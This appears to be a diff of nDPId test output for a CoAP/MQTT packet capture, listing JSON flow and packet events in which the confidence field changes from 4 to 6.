-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1455907272858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1455907272858,"pkt":"CAAnAERyCAAnmO\/hCABFAAAuXhFAAEAR6vbAqDhlwKg4AURcxI4AGvHiYkQdqQeYiy9yL0J1czE3Q21k"} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1455907272969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907272969,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/EYMAAIARNzTAqDgBwKg4ZcSORFwAa8WlRgMdqhF5z0YYRXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMyBFRVQgMjAxNiJ9"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455907274088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1455907274088,"pkt":"CAAnmO\/hCAAnAERyCABFAAB9EncAAIARNkLAqDgBwKg4ZcSIRFwAaR7GRANSj9XGl0FyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTQgRUVUIDIwMTYifQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1455907274089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1455907274089,"pkt":"CAAnAERyCAAnmO\/hCABFAAAwXqNAAEAR6mLAqDhlwKg4AURcxIgAHPHkZERSj9XGl0GLL3IvQnVzMTdDbWQ="} 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1455907274193,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1455907274193,"pkt":"CAAnmO\/hCAAnAERyCABFAACBEpIAAIARNiPAqDgBwKg4ZcSIRFwAbeMnSANSkLugNTWCkTE2ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjE0IEVFVCAyMDE2In0="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455907275690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907275690,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/FCAAAIARNJfAqDgBwKg4ZcSPRFwAa2JLRgOAZtDWwMpn\/nJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxNSBFRVQgMjAxNiJ9"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1455907275695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1455907275695,"pkt":"CAAnAERyCAAnmO\/hCABFAAAyX35AAEAR6YXAqDhlwKg4AURcxI8AHvHmZkSAZtDWwMpn\/osvci9CdXMxN0NtZA=="} 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2015,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1455907275831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1455907275831,"pkt":"CAAnmO\/hCAAnAERyCABFAACAFEwAAIARNGrAqDgBwKg4ZcSPRFwAbLkURwOAZ6ExGoh1VzNyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTUgRUVUIDIwMTYifQ=="} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
-00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
